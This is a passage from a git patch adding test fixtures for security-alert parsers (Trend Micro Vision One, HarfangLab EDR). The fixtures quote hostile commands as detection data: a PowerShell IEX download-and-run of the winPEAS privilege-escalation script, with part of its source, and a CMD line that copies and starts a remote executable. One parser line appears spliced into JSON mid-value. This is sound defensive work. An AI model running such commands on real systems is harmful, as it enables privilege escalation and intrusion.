"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303" + }, + "parent": { + "command_line": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S", + "executable": "C:\\Windows\\System32\\cmd.exe", + "hash": { + "sha256": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + } + }, + "pid": 5552 + }, + "related": { + "hash": [ + "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303", + "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + ], + "ip": [ + "19.112.87.74" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Process Injection from Windows Temporary Location to System32" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "incident_id": "IC-14558-20240722-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 83d7e99b5..61b294270 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -20,6 +20,7 @@ "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" }, "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", "ip": [ "10.10.58.51" ], diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json new file mode 100644 index 000000000..e3283fe41 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json @@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Possible Web Service Abuse", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-26T16:45:28Z", + "action": { + "properties": { + "ScriptBlockText": "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" + } + }, + "host": { + "id": "e930412e-e09c-454b-a508-576ba266b9d8", + "ip": [ + "20.193.45.33" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha256": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + ], + "ip": [ + "20.193.45.33" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Possible Web Service Abuse" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file From e88ee2f227504e1d060cad7568d9bf5a58b31b6c Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 28 Nov 2024 16:56:30 +0100 Subject: [PATCH 80/84] fix/Harfanglab --- HarfangLab/harfanglab/ingest/parser.yml | 225 ++++++++++++++++++++++- HarfangLab/harfanglab/tests/alert_4.json | 112 +++++++++++ HarfangLab/harfanglab/tests/alert_5.json | 88 +++++++++ 3 files changed, 424 insertions(+), 1 deletion(-) create mode 100644 HarfangLab/harfanglab/tests/alert_4.json create mode 100644 HarfangLab/harfanglab/tests/alert_5.json diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 1376e0758..93671efde 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -29,6 +29,14 @@ pipeline: input_field: "{{json_event.message.event_data.TaskContent}}" output_field: message + - name: parse_task_info_2 + filter: "{{json_event.message.eventlog.event_data.TaskContent != null and ':\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch 